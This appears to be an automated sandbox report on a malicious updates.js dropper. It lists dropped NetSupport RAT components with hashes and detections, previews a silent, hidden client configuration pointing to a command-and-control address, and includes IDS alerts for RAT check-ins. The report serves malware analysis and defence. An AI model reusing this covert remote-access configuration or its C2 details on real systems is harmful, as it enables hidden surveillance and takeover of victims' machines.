                                                                            • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            • Filename: Update_122.0.616.js, Detection: malicious, Browse
                                                                            • Filename: BILL93607.js, Detection: malicious, Browse
                                                                            • Filename: , Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):195
                                                                            Entropy (8bit):4.924914741174998
                                                                            Encrypted:false
                                                                            SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                            MD5:E9609072DE9C29DC1963BE208948BA44
                                                                            SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                            SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                                                                            SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                            Malicious:true
                                                                            Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Generic INItialization configuration [Features]
                                                                            Category:dropped
                                                                            Size (bytes):6458
                                                                            Entropy (8bit):4.645519507940197
                                                                            Encrypted:false
                                                                            SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                            MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                            SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                            SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                            SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                            Malicious:false
                                                                            Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):18808
                                                                            Entropy (8bit):6.292094060787929
                                                                            Encrypted:false
                                                                            SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                            MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                            SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                            SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                            SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICHEK.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                            Joe Sandbox View:
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            • Filename: Update_122.0.616.js, Detection: malicious, Browse
                                                                            • Filename: BILL93607.js, Detection: malicious, Browse
                                                                            • Filename: , Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3740024
                                                                            Entropy (8bit):6.527276298837004
                                                                            Encrypted:false
                                                                            SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                            MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                            SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                            SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                            SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLL, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\PCICL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 6%
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):396664
                                                                            Entropy (8bit):6.80911343409989
                                                                            Encrypted:false
                                                                            SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                            MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                            SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                            SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                            SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\TCCTL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 6%
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1447
                                                                            Entropy (8bit):5.302827444337103
                                                                            Encrypted:false
                                                                            SSDEEP:24:2dt4uiNK+bIgMy5PYMPgiE/M7cJ3Zb2WF+HZ6iYzDfDJ6:cSVK+bIgMyRYSzIlz+HZ6XDfDJ6
                                                                            MD5:FFCF52AB3F76D8FB8E0C0ECA5F858F01
                                                                            SHA1:5EC475C9A55DA6684372373D6DFC5D13B3DE48CF
                                                                            SHA-256:8B6F3769FC0367421E2748C9775BBF16645B502621A8AEEF4974C58BFA067864
                                                                            SHA-512:0E64B1E26130E5A854BB3E321D529957CEE47BEC99D4A0E3A80FCF268661FD5F9DC96E2386FE3EE29654524D03CA900CC7A7CD2499742EB01711AA66DC2A03CB
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>.. </dependentAssembly>.. </dependency>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>.. </requestedPrivileges>.. </security>.. </trustInfo>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>.. <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>.. <s
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):103824
                                                                            Entropy (8bit):6.674952714045651
                                                                            Encrypted:false
                                                                            SSDEEP:768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
                                                                            MD5:C4F1B50E3111D29774F7525039FF7086
                                                                            SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
                                                                            SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
                                                                            SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 26%
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):671
                                                                            Entropy (8bit):5.4560190834919675
                                                                            Encrypted:false
                                                                            SSDEEP:12:dxS2hz7YU+Sj8qGShR8kkivlnxOZ7+DP981E7GXXfDWQCYnmSuObANTEa:dI2hzEPI8qNR8pivlnxOoG1fXXfD/DbK
                                                                            MD5:C94845BB509056E66EE5767759C9E5BD
                                                                            SHA1:C1B6E003CF0AB1F236375FAEBE8707D519FD8A3D
                                                                            SHA-256:B2CAADB660455F1AAF3737B93879E35D05602BE1FDF2531602FD61E006E8C80A
                                                                            SHA-512:6C3750804763221BC72031C051EB9AE67874FFAE7795F96435EF577FF3F7E84F5A42C9715EBBDE53B1BD9E9AD5B7E59A691AB36DF2267A5A5FC2C84F032D1E86
                                                                            Malicious:false
                                                                            Preview:0x451906b9....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=0..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32u.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=94.158.245.103:443..gskmode=0..GSK=EK:I?GBHEM:H?LDK9M>DCAGB..GSKX=EIHJ=HBKHH;L>GCIFI;H>MCP..
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65533), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):613362
                                                                            Entropy (8bit):6.022362807465715
                                                                            Encrypted:false
                                                                            SSDEEP:12288:MyLOECzdyqLHl8ODcwPawFSoucO5JYhuFMZUpSFW7v1nq2w9b6qW3:kEqNLOODyoNNsqUpSFW7v4j9b6qW3
                                                                            MD5:D34FA84A88438C889B21D1AFA1D7348E
                                                                            SHA1:37905A3931BF2FAA104047408BAA3790AD4A5070
                                                                            SHA-256:98F0F679B47D1151C18064A44A8E097C338EBF1679A23EACC20740EC19852740
                                                                            SHA-512:F7B0CF48C4720F44EA2906CD3101A6C35CF690897ADD6CA66859EAC66B7129CA8805A85309E7747CC83ABB847C17424800D66AC2D4E55A44116F401998F2AC1D
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8
                                                                            Entropy (8bit):2.25
                                                                            Encrypted:false
                                                                            SSDEEP:3:SVyn:Ssn
                                                                            MD5:17412178172B24C5E570F6F13C42F4C0
                                                                            SHA1:F0AAC01BDD57F034D9CDA7DBEC9DD97C0DCB81EB
                                                                            SHA-256:2F2BB8B0A74E9049F4EE9DD039D81BC853FA8DB3F311A799032F002B9CC1DE41
                                                                            SHA-512:3B9808F22E3455505DA42B26D3C0C0D56CBAC41FD0D2076C3363273D9E77064047D8FC7B969612A5F5C78E0588F510DDD5B2173BE224B1B5EEDC5E51E9E5A92E
                                                                            Malicious:false
                                                                            Preview:1.0.1244
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):366601
                                                                            Entropy (8bit):5.662364865781263
                                                                            Encrypted:false
                                                                            SSDEEP:6144:vxWr2xoTIpupSwg1QMMXntfaY46yX1/PrMN8xKHfHqzHs:8r2WTqUl5MOnqavqY
                                                                            MD5:1761DC1760C752B6A16BF6F8797B207B
                                                                            SHA1:AE0C16AF795ADA3047F086DC841F66FF561FF139
                                                                            SHA-256:8C437A858E53894C6072D521459662FECEB3B1E416F62F3F4961D1F6C62B4C9D
                                                                            SHA-512:EBCE0FE7F70E4F8698B3A758C58309F461A25DDFFA413B8440EDFE593F70EE4D26046E3FE36EB1F01A4C0FA042270EAB29D2D717B0A02F1994870E1D9F4BBE09
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):474195
                                                                            Entropy (8bit):5.557096749384389
                                                                            Encrypted:false
                                                                            SSDEEP:12288:EpFCZh0dne0ymuV8iObj/9XY441LSPwOi6PtQE0sIkcOBZfb9NVmEV//QpSY:EPC/9VVLcd/Qj
                                                                            MD5:DDFCAC89248FDC7C51C1A932B6AC1C37
                                                                            SHA1:B16577290A95346B74C84D95F3B3763219BE999C
                                                                            SHA-256:9FCB23EDFB0C68015EB5DC54B2FA48E2E5C3410FACD56547A33B6888EC71E079
                                                                            SHA-512:84E812C5E0FD0F61EC370D3751ED5F0059E62566E8BE125D705B37DCDB5A04B82399D531C261278D4E9292923EDBCE67B49CFCEB57263B83292C695F745732ED
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65533), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):613362
                                                                            Entropy (8bit):6.022362807465715
                                                                            Encrypted:false
                                                                            SSDEEP:12288:MyLOECzdyqLHl8ODcwPawFSoucO5JYhuFMZUpSFW7v1nq2w9b6qW3:kEqNLOODyoNNsqUpSFW7v4j9b6qW3
                                                                            MD5:D34FA84A88438C889B21D1AFA1D7348E
                                                                            SHA1:37905A3931BF2FAA104047408BAA3790AD4A5070
                                                                            SHA-256:98F0F679B47D1151C18064A44A8E097C338EBF1679A23EACC20740EC19852740
                                                                            SHA-512:F7B0CF48C4720F44EA2906CD3101A6C35CF690897ADD6CA66859EAC66B7129CA8805A85309E7747CC83ABB847C17424800D66AC2D4E55A44116F401998F2AC1D
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:JSON data
                                                                            Category:dropped
                                                                            Size (bytes):170
                                                                            Entropy (8bit):4.67078204534958
                                                                            Encrypted:false
                                                                            SSDEEP:3:mifFuY9HnQA5JVPqS18iMDXAh/OR6TAulLvPxAUNV/RWFVXAkEpMgMYv:v5975JVSS18iMkh26Vlp//gQNMC
                                                                            MD5:CBA80EE11DE525535BF2068AC23107B0
                                                                            SHA1:479C817E5B4AE2E49E1E950359F072DD8A8D227F
                                                                            SHA-256:333654272A482DC66A15D07C778CDFED72E74F6FA50342F00995E26F5DC7678F
                                                                            SHA-512:5ACDFD8874E3506C65446F5B5022879B74D5FAA4D05AF36C9835A35E542BAB21D81AF0F334403F9F3597B12C20C52E2DE9377ED7B22466DEA3D7ECE47810D5F8
                                                                            Malicious:false
                                                                            Preview:{. "name": "MEI Preload", . "icons": {}, . "version": "1.0.7.1652906823", . "manifest_version": 2, . "description": "Contains preloaded data for Media Engagement".}.
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):428738
                                                                            Entropy (8bit):5.633613175057363
                                                                            Encrypted:false
                                                                            SSDEEP:6144:PO9/3sERZht7a5XBZLE2mV9RfPLyJDPrwnCWacgjjW5cRE0O2fGOGwNws/08gh8h:FER8XzwPgnma9
                                                                            MD5:0E95005552BA506314B1591376EB9D75
                                                                            SHA1:58B3C2EC36D3738AB8E10105C12BE1784C627F31
                                                                            SHA-256:72CB1CBC47EC3D560E02A19B4A9DF7FF6C4E232CA98286158E78CFF346A4CD46
                                                                            SHA-512:88FDDFD0E22C4A21A36C97E27758149691D7E61F8C44CF69AAF3C9CE977CB29FA0949A76BF343A36D352B48BDCBD66C8AD6CEB6FAB7C247A73BDAA4116A314B7
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):361713
                                                                            Entropy (8bit):6.790395434377143
                                                                            Encrypted:false
                                                                            SSDEEP:6144:nBWo6FHO66dFrmKSvqRSRbq9SgvFzJlkVDE:nBWoo563rnyrgtzJlku
                                                                            MD5:B854863EDFE51CED85381590992C1DEA
                                                                            SHA1:5202285EAC135C1D444459E0969D1481833EEA8E
                                                                            SHA-256:41DA1543A2E58B1932EF7E525A93BB3336CBE6CB6AB0648A604D0E59589931EF
                                                                            SHA-512:3C3D1887D99063BA2938D844C2A5FB2F9FDB2FB043347BFC5DD2A0907CD2F1FCF8F25D6B36728D4531E68171055DFD58D82FED636BBE72F46E7076748AC0D6B8
                                                                            Malicious:false
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF, LF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1794
                                                                            Entropy (8bit):3.5509498109363986
                                                                            Encrypted:false
                                                                            SSDEEP:24:eCrjdMrTm893chS4Mw2n1iFotb496fjCuTiBCVXTbzVHeEVt:/rS0EQn8bB+EVt
                                                                            MD5:3F78A0569C858AD26452633157103095
                                                                            SHA1:8119BCC1D66B17CCD286FEF396FA48594188C4D0
                                                                            SHA-256:D53FC339533D39F413DDD29A69ADE19F2972383DB8FB8938D77D2E79C8573F36
                                                                            SHA-512:89842E39703970108135D71CE4C039DF19C18F04C280CB2516409758F9D22E0205567B08DBE527A6FB7C295BDA2EA8EE6A368D6FCAF6FB59645D31EF2243AD3D
                                                                            Malicious:false
                                                                            Preview://353b2d6049dd2f0998bdd73f13855b290ad0be89f62d61dbc2672253e4fb72da.{.. "install": {.. "clids": {.. "clid1": {.. "clid": "1985548",.. "vid": "225".. },.. "clid10": {.. "clid": "1985553",.. "vid": "225".. },.. "clid100004": {.. "clid": "1985555",.. "vid": "225".. },.. "clid1010": {.. "clid": "2372823",.. "vid": "".. },.. "clid15": {.. "clid": "1985554",.. "vid": "225".. },.. "clid21": {.. "clid": "2372816",.. "vid": "".. },.. "clid25": {.. "clid": "2372817",.. "vid": "".. },.. "clid28": {.. "clid": "2372813",.. "vid": "".. },.. "clid29": {.. "clid": "2372821",.. "vid": "".. },.. "clid30": {.. "clid": "2372822",.. "v
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):773968
                                                                            Entropy (8bit):6.901559811406837
                                                                            Encrypted:false
                                                                            SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                                            MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                                            SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                                            SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                                            SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Windows setup INFormation
                                                                            Category:dropped
                                                                            Size (bytes):328
                                                                            Entropy (8bit):4.93007757242403
                                                                            Encrypted:false
                                                                            SSDEEP:6:a0S880EeLL6sWqYFcf8KYFEAy1JoHBIr2M2OIAXFYJKRLIkg/LH2yi9vyifjBLWh:JShNvPG1JoHBx2XFhILH4Burn
                                                                            MD5:26E28C01461F7E65C402BDF09923D435
                                                                            SHA1:1D9B5CFCC30436112A7E31D5E4624F52E845C573
                                                                            SHA-256:D96856CD944A9F1587907CACEF974C0248B7F4210F1689C1E6BCAC5FED289368
                                                                            SHA-512:C30EC66FECB0A41E91A31804BE3A8B6047FC3789306ADC106C723B3E5B166127766670C7DA38D77D3694D99A8CDDB26BC266EE21DBA60A148CDF4D6EE10D27D7
                                                                            Malicious:false
                                                                            Preview:; nskbfltr.inf..;..; NS Keyboard Filter..; ..;..; This inf file installs the WDF Framework binaries....[Version]..Signature="$Windows NT$"..Provider=NSL......;..;--- nskbfltr Coinstaller installation ------..;......[nskbfltr.NT.Wdf]..KmdfService = nskbfltr, nskbfltr_wdfsect....[nskbfltr_wdfsect]..KmdfLibraryVersion = 1.5......
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):46
                                                                            Entropy (8bit):4.532048032699691
                                                                            Encrypted:false
                                                                            SSDEEP:3:lsylULyJGI6csM:+ocyJGIPsM
                                                                            MD5:3BE27483FDCDBF9EBAE93234785235E3
                                                                            SHA1:360B61FE19CDC1AFB2B34D8C25D8B88A4C843A82
                                                                            SHA-256:4BFA4C00414660BA44BDDDE5216A7F28AECCAA9E2D42DF4BBFF66DB57C60522B
                                                                            SHA-512:EDBE8CF1CBC5FED80FEDF963ADE44E08052B19C064E8BCA66FA0FE1B332141FBE175B8B727F8F56978D1584BAAF27D331947C0B3593AAFF5632756199DC470E5
                                                                            Malicious:false
                                                                            Preview:[COMMON]..Storage_Enabled=0..Debug_Level=0....
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):33144
                                                                            Entropy (8bit):6.7376663312239256
                                                                            Encrypted:false
                                                                            SSDEEP:768:JFvNhAyi5hHA448qZkSn+EgT8ToDXTVi0:JCyoHA448qSSzgIQb
                                                                            MD5:34DFB87E4200D852D1FB45DC48F93CFC
                                                                            SHA1:35B4E73FB7C8D4C3FEFB90B7E7DC19F3E653C641
                                                                            SHA-256:2D6C6200508C0797E6542B195C999F3485C4EF76551AA3C65016587788BA1703
                                                                            SHA-512:F5BB4E700322CBAA5069244812A9B6CE6899CE15B4FD6384A3E8BE421E409E4526B2F67FE210394CD47C4685861FAF760EFF9AF77209100B82B2E0655581C9B2
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\pcicapi.dll, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):63864
                                                                            Entropy (8bit):6.446503462786185
                                                                            Encrypted:false
                                                                            SSDEEP:1536:Tf6fvDuNcAjJMBUHYBlXU1wT2JFqy9BQhiK:D6f7cjJ4U4I1jFqy92hiK
                                                                            MD5:6FCA49B85AA38EE016E39E14B9F9D6D9
                                                                            SHA1:B0D689C70E91D5600CCC2A4E533FF89BF4CA388B
                                                                            SHA-256:FEDD609A16C717DB9BEA3072BED41E79B564C4BC97F959208BFA52FB3C9FA814
                                                                            SHA-512:F9C90029FF3DEA84DF853DB63DACE97D1C835A8CF7B6A6227A5B6DB4ABE25E9912DFED6967A88A128D11AB584663E099BF80C50DD879242432312961C0CFE622
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                            Category:dropped
                                                                            Size (bytes):3731115
                                                                            Entropy (8bit):7.998188939894259
                                                                            Encrypted:true
                                                                            SSDEEP:98304:E1NFXa/hRFY89YYc9jh23redpmQR6Q6/mizhpX6mD:UNSxYoY59V0redpmQR6jhpl
                                                                            MD5:1D982823F1D159185450F98204AC32EA
                                                                            SHA1:698B10CF72E8D12D047872746EB1E882FF2DD15A
                                                                            SHA-256:7A49D805AFFC15E1755D0DB339705147FACA5A4254C20B9169529FD1CC5FB2D0
                                                                            SHA-512:C7F11F4C074E35A66D6549CFA8050199D610DFCE253C799DCF1647DBCB5896AB731470EF24021C460D572F02C1AAEA98005C6F97DED55C9E98FD84B3E1ECDF7F
                                                                            Malicious:false
                                                                            File type:ASCII text
                                                                            Entropy (8bit):4.952347714265242
                                                                            TrID:
                                                                            • Java Script (8502/1) 68.00%
                                                                            • Digital Micrograph Script (4001/1) 32.00%
                                                                            File name:updates.js
                                                                            File size:7'688'860 bytes
                                                                            MD5:2826502a26311bbe395d5ab565114330
                                                                            SHA1:1764ea00a1262c07b13d0c4b059e88e57650dfc4
                                                                            SHA256:65ab8ed555628693952b1fc385feca757b0a689981128d848f2c39a52e7da1e9
                                                                            SHA512:578eaf54cab019a8f1b166b1da0b5580ee8081bfd1629fe938e366ac855b501016d84e5567008069d900a970247577ae998191d028ce5904dd7c0a7bee451239
                                                                            SSDEEP:49152:47h4zjCxb7qHlp4BOlN0KFhcuscyEMzYsm7++86mn3Ef/Vf7GI0/3qp6RCgScEQu:1
                                                                            TLSH:EC76E40DAEF71091A923313C8FAF640AB6748017190ADD143D9DA3945FA953867FEFE8
                                                                            File Content Preview:/*.* Licensed to the Apache Software Foundation (ASF) under one.* or more contributor license agreements. See the NOTICE file.* distributed with this work for additional information.* regarding copyright ownership. The ASF licenses this file.* to you un
                                                                            Icon Hash:68d69b8bb6aa9a86
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/16/24-22:29:48.775589 | UDP | 2054426 | ET TROJAN ZPHP CnC Domain in DNS Lookup (dfwreds .com) | 58012 | 53 | 192.168.2.4 | 1.1.1.1
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP
2024-07-16T22:29:37.087965+0200 | TCP | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 49731 | 443 | 192.168.2.4 | 94.158.245.103
2024-07-16T22:29:37.087965+0200 | TCP | 2857473 | ETPRO MALWARE Malicious NetSupport Rat CnC Checkin | 49731 | 443 | 192.168.2.4 | 94.158.245.103
2024-07-16T22:29:54.986481+0200 | TCP | 2034559 | ET POLICY NetSupport GeoLocation Lookup Request | 49732 | 80 | 192.168.2.4 | 104.26.0.231
2024-07-16T22:30:00.900003+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49733 | 20.12.23.50 | 192.168.2.4
